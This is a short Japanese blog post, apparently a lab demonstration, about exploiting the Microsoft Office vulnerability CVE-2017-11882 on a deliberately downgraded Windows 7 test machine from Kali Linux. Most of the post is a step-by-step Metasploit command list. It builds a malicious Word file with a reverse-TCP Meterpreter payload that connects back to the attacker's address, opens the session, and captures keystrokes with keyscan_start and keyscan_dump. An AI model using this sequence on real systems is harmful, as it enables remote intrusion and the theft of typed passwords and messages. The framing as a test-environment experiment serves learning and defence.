【攻撃の体験】 CVE2017-11882を使用してExploit
今回は、CVE2017-11882(Microsoft Office)の脆弱性を使用して、PCをExploitする実験を行ってみました。
Exploit後はいろいろなことができそうでしたが、今回はキー入力を抜き取ってみました。
環境は以下の通りとなります。
テスト環境
攻撃を受けるPC:Windows7 Office2016(脆弱性修正前の状態にダウングレード)
攻撃するPC :Kali Linux
使用したコマンド
msfconsole
→metasploitの起動
set payload windows/meterpreter/reverse_tcp
→payloadの指定
set filename ・・・
→攻撃に使用するWORDファイルの作成場所とファイル名の指定
set lhost ・・・
→攻撃した相手の接続先(攻撃者のIPアドレス)の指定
Exploit
→Exploitの実行
sessions
→確立したセッションの確認
sessions -i 1
→確立したセッションへの接続
sysinfo
→システム情報の表示
keyscan_start
→キー入力の情報取得開始
keyscan_dump
→キー入力の情報表示
動画をご覧いただければ、想像以上に簡単にexploitできてしまうということが分かるかと思います。